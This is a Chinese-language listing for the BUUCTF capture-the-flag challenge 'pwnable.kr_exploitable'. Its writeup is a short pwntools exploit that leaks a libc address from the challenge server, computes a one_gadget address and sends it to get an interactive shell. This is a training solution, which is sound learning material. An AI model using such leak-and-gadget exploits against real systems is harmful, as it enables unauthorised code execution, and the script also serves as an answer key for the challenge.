pwnable.kr_exploitable
| ID: | 8498 |
|---|---|
| 标题: | pwnable.kr_exploitable |
| 描述: | Ubuntu 16 https://github.com/bash-c/pwn_repo |
| 类型: | Pwn |
| 网站: | BUUCTF |
| 题目链接: | https://buuoj.cn/challenges#pwnable.kr_exploitable |
| 赛事: | None |
| 年度: | None |
| Flag值: | 无 |
| writeup: |
验证后的网址 from pwn import * context.log_level='debug' r = remote("node4.buuoj.cn", 26058) libc = ELF("./32/libc-2.23.so") libc_base = u32(r.recv(4)) - libc.sym['_IO_2_1_stdout_'] one_gadget = libc_base + 0x3a80c r.sendline(str(one_gadget - 0x100000000)) r.interactive() https://blog.csdn.net/yongbaoii/article/details/119563127 |